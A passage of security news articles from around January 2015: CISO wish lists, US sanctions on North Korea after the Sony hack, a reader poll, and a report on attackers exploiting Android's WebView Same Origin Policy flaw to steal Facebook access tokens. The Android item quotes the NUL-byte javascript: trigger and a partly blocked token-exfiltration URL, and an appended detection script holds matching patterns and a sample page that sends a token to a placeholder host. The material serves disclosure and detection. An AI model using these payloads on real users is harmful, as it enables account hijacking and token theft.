“It would be nice to have an IT team and user base that cares about security as much as the security team,” Zimmermann said. “Or being included in conversations about new technology developments, purchases, or deployments before final decisions are made.”

It would also help the CSO to have “better clarity from legal on what a breach is, what an incident is, and what we can safely ignore,” Davis said.

IT should “actually follow the security guidelines we built instead of always getting a risk waiver,” added Davis. With a waiver, IT essentially says it understands the risks and therefore doesn’t have to implement the proper controls or carry out specific tasks to resolve an issue. This doesn’t help the organization’s overall security. Vendors also need to think about security—whether it’s in their software development cycle, the patching system, or even maintaining their cloud infrastructure. “Tired of getting vendor software that isn’t secure and I can’t make secure,” he said.

Speaking of software development, proper tools are critical. All developers should have security training so that they think about security right from the design phase, said Steven Lipner, chairman of SAFECode and partner director of program management at Microsoft’s Trustworthy Computing group. Each developer in the organization should receive a full toolbox for static analysis, current compilers, and fuzzing tools to build code that contains even fewer vulnerabilities, and make it even harder to exploit any that remain, he said.

Legions of Experienced Folks

The biggest challenge for CISOs is not fighting for the ideal infosec budget, but finding and hiring employees with necessary skills and experience. CISOs want a “proper staff” of experienced and knowledgeable security professionals and are looking for the right people to handle the security fundamentals, Maiffret said.

CISOs want to hire staff who are focused on analytics and risk, not just running firewalls, Cowperthwaite said. This echoed CounterTack’s Davis, who noted that universities tend to focus on network security, not realizing that network security is not the same as IT security.

“It is only one slice of the problem,” Davis said.

Turning Wishes into Reality

As the old saying goes, “If wishes were horses…” CISOs may have a long list for what they would like to see, but they can’t just sit back and wait for their wishes to be granted. CISOs should make a New Year’s resolution to become a corporate business leader, said Trull. CISOs need to become more integrated into c-suite conversations, focus on the integration between DevOps and security teams, learn the business and understand the financials, and learn to speak the language of other executives including the ability to calculate and demonstrate a return on investment for cybersecurity spending.

Security leaders must align themselves more closely to business strategy and “operationalize on the fundamentals of good IT,” said Rafal Los, director of solutions research and member of the Accuvant Office of the CISO. The goal is to get business leaders to see security as a strategic asset and not a drag on the budget.

CISOs must “resolve to be more than a technical security professional and to take responsibility for making difficult risk-benefit decisions that drive the business forward,” Trull said.

All of these wish list items sounded reasonable, but there was a sense of frustration among security experts about the obstacles in their way. The technology was not available, other C-suite executives and the board remained uninterested, or the integration with IT was too tense. Would 2015 be the year when information security professionals would get a seat at the table and be able to work with the organization to improve security?

If the wish list items were too much to ask for, “would you consider coming up with some sort of solution that would allow CISOs to take Sundays off?” Levine said.


Fahmida Y. Rashid is a Senior Contributing Writer for SecurityWeek. She has experience writing and reviewing security, core Internet infrastructure, open source, networking, and storage. Before setting out her journalism shingle, she spent nine years as a help-desk technician, software and Web application developer, network administrator, and technology consultant.


US Slaps Sanctions on North Korea After Sony Hack

Posted on January 4, 2015 by in Security

The United States imposed new sanctions Friday on North Korea in retaliation for a cyber attack on Hollywood studio Sony Pictures.

In an executive order President Barack Obama authorized the US Treasury to place on its blacklist three top North Korean intelligence and arms operations, as well as 10 government officials, most of them involved in Pyongyang’s arms exports.

Obama said he ordered the sanctions because of “the provocative, destabilizing, and repressive actions and policies of the Government of North Korea, including its destructive, coercive cyber-related actions during November and December 2014.”

The activities “constitute a continuing threat to the national security, foreign policy, and economy of the United States,” he added, in a letter to inform congressional leaders.

“The order is not targeted at the people of North Korea, but rather is aimed at the Government of North Korea and its activities that threaten the United States and others,” Obama added.

The sanctions come after hackers penetrated Sony’s computers in late November, stealing and releasing over the Internet employee information, unreleased films and an embarrassing trove of emails between top company executives.

The hackers — a group calling itself Guardians of Peace — then began to issue threats against the company over the looming Christmas release of the comedy film “The Interview”, which depicts a fictional CIA plot to kill North Korea’s leader.

The threats led first to worried movie theater owners dropping the film and then Sony cancelling the public debut altogether, before releasing it online.

After the hackers invoked the 9/11 attacks in their threats, the White House branded it a national security threat, and an investigation by the FBI said North Korea was behind the Sony intrusion.

Pyongyang repeatedly denied involvement, but has applauded the actions of the shadowy Guardians of Peace group.

‘Proportional’ response

The White House stressed Friday that its response will be “proportional”, but also that the sanction actions were only “the first aspect of our response.”

“We take seriously North Korea’s attack that aimed to create destructive financial effects on a US company and to threaten artists and other individuals with the goal of restricting their right to free expression,” said White House press secretary Josh Earnest.

In parallel with the White House announcement, the Treasury named the first targets of sanctions in the Sony case.

They included the Reconnaissance General Bureau, the government’s main intelligence organization, and two top North Korean arms exporters: Korea Mining Development Trading Corporation (KOMID) and Korea Tangun Trading Corporation.

The individuals named included agents of KOMID in Namibia, Russia, Iran and Syria, and other representatives of the government and the sanctioned organizations.

An administration official, briefing reporters, said that they remain “very confident” in their assessment that Pyongyang is behind the attack on Sony, amid doubts raised by security experts.

The official said the three organizations had “no direct involvement” with the hacking. “They’re being designated to put pressure on the North Korean government,” the official said.

It was the first time the Treasury sanctions mechanism had been invoked due to a threat to a private company, the official acknowledged.

The sanctions forbid US individuals and companies from doing business with those blacklisted, and freeze any assets those blacklisted might have on US territory.

A particular aim of such sanctions is to limit their access to international financial services by locking them out of the US financial system.

All three of the organizations blacklisted in the Sony case are already under US sanctions for the country’s persistence with its nuclear weapons program, its alleged provocations on the Korean peninsula, and other “continued actions that threaten the United States and others,” as Obama said in his letter.


© AFP 2013


Do You Take Extra Steps to Protect Yourself Online?

Posted on January 1, 2015 by in Blog

There are many steps you can take to protect yourself online, yet not everyone takes the time to do so. Some simply leave everything to fate. What about you? Do you take additional steps to protect yourself online? The most obvious step is to install anti-virus and anti-spyware software. It is not that expensive and can be installed fairly easily. You can install a firewall as another layer of protection; it works as a filter that keeps unwanted traffic out. Using an anti-spam email provider can keep many unwanted junk messages from reaching you. These are only a few quick options, but they are choices that people who are concerned about their privacy typically make without question.

Is this a concern of yours? Not everyone worries about their private information being stolen online. They may be very trusting and simply assume it will be fine as long as they don’t do anything to attract unwanted attention.

Which camp do you belong to? Do you take additional measures to protect yourself online, or do you leave it to fate and assume everything will be fine?

Image Credit: Wikimedia Commons

Facebook Users Targeted Via Android Same Origin Policy Vulnerability

Posted on December 29, 2014 by in Security

Researchers at Trend Micro say attackers are actively exploiting a vulnerability in Android’s WebView browser in order to compromise Facebook accounts.

The flaw allows the attackers to bypass Android’s Same Origin Policy (SOP), and impacts devices running versions of the operating system prior to 4.4. The vulnerability, CVE-2014-6041, was first disclosed in September by an independent researcher. But months later, the vulnerability continues to be exploited in the wild.

“The Android WebView in Android before 4.4 allows remote attackers to bypass the Same Origin Policy via a crafted attribute containing a \u0000 character, as demonstrated by an onclick="window.open('\u0000javascript: sequence to the Android Browser application 4.2.1 or a third-party web browser,” according to the National Vulnerability Database.

According to Trend Micro Mobile Security Engineer Simon Huang, the attack targets Facebook users via a link in a particular Facebook page that leads to a malicious site. The page contains obfuscated JavaScript code that includes an attempt to load a Facebook URL in an inner frame. The user will only see a blank page as the page’s HTML has been set not to display anything via its div tag while the inner frame has a size of one pixel, he added.

“While these routines are being carried out, the SOP bypass is being performed,” he blogged, adding that a remote JavaScript file is loaded from a legitimate cloud storage provider.

The file, he noted, contains the malicious code of the attack and enables the attackers to perform the following activities on Facebook:

  1. Add friends
  2. Like and follow Facebook pages
  3. Modify subscriptions
  4. Authorize a Facebook app to access the user’s public profile, friends list, birthday information, likes and friends’ likes
  5. Steal the victim’s access tokens and upload them to their server at http://{BLOCKED}martforchristmas.website/walmart/j/index.php?cid=544fba6ac6988&access_token=$token
  6. Collect analytics data (such as victims’ location, HTTP referrer, etc.) using the legitimate service at https://whos.{BLOCKED}ung.us/pingjs/

“In addition to the code at the above site, we found a similar attack at http://www.{BLOCKED}php.com/x/toplu.php,” Huang explained. “We believe both of them are created by the same author because they share several function names, as well as the client_id of the Facebook app.”

“The client_id involved in this malware was ‘2254487659’,” he added. “This is an official BlackBerry App maintained by BlackBerry. We confirmed with BlackBerry and clarified that this malware is trying to take advantage of the trusted BlackBerry brand name and steal user’s access-tokens, which can be used to make requests to Facebook APIs and read user’s information or to publish content to Facebook on behalf of a person.”

BlackBerry is working with Facebook and Trend Micro to address the issue. Google has already issued a fix for the vulnerability for Android users.
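As an added example (not code from the article, Trend Micro, or Google), the Python scanner below flags, in captured page content, the three indicators Huang describes: the \u0000-prefixed javascript: scheme from the NVD entry, a one-pixel iframe loading facebook.com, and an access_token forwarded to a non-Facebook host; it also checks whether a reported Android version falls in the affected range. The detection rules, the sample page and the host collector.example are constructed for this example.

```python
import re

# Hypothetical detection rules for the behaviours the article describes.
# They are illustrative, not Trend Micro's signatures.

# 1. The CVE-2014-6041 trigger: a NUL before the javascript: scheme inside an
#    attribute, whether written as the JS escape \u0000, a raw NUL byte, or a
#    URL/HTML-encoded zero.
NUL_JS_SCHEME = re.compile(
    r"(?:\\u0000|\\x00|\x00|%00|&#0+;|&#x0+;)\s*javascript:", re.IGNORECASE
)

# 2. A one-pixel or hidden iframe whose src points at facebook.com.
IFRAME = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ONE_PIXEL = re.compile(
    r"""(?:width|height)\s*=\s*["']?1(?:px)?["']?|display\s*:\s*none""",
    re.IGNORECASE,
)
SRC = re.compile(r"""src\s*=\s*["']([^"']+)""", re.IGNORECASE)

# 3. An access_token query parameter sent to a host other than Facebook's.
TOKEN_URL = re.compile(
    r"""https?://([^/\s'"]+)[^\s'"]*access_token=""", re.IGNORECASE
)


def scan_page(html: str) -> list[str]:
    """Return one finding string per matched indicator (empty list if clean)."""
    findings = []
    if NUL_JS_SCHEME.search(html):
        findings.append("nul-byte javascript: scheme (CVE-2014-6041 trigger)")
    for tag in IFRAME.findall(html):
        src = SRC.search(tag)
        if src and "facebook.com" in src.group(1).lower() and ONE_PIXEL.search(tag):
            findings.append(f"hidden one-pixel iframe loading {src.group(1)}")
    for m in TOKEN_URL.finditer(html):
        host = m.group(1).lower()
        if not host.endswith("facebook.com"):
            findings.append(f"access_token sent to third-party host {host}")
    return findings


def is_affected_android(version: str) -> bool:
    """True when the Android release is below 4.4, the range the article names."""
    parts = [int(p) for p in version.split(".")[:2]]
    while len(parts) < 2:
        parts.append(0)
    return tuple(parts) < (4, 4)


# Constructed sample page mirroring the article's description: a hidden div
# wrapping a one-pixel facebook.com iframe, the NUL-prefixed scheme from the
# NVD text (with a harmless payload), and a token posted to a placeholder host.
SAMPLE_PAGE = """<html><body>
<div style="display:none">
  <iframe src="https://www.facebook.com/" width="1" height="1"></iframe>
</div>
<a onclick="window.open('\\u0000javascript:void(0)')">click</a>
<script>
  var bad = "https://collector.example/index.php?access_token=" + token;
  var ok  = "https://graph.facebook.com/me?access_token=" + token;
</script>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_PAGE):
        print("FINDING:", finding)
    print("Android 4.2.1 affected:", is_affected_android("4.2.1"))
```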


Brian Prince is a Contributing Writer for SecurityWeek.
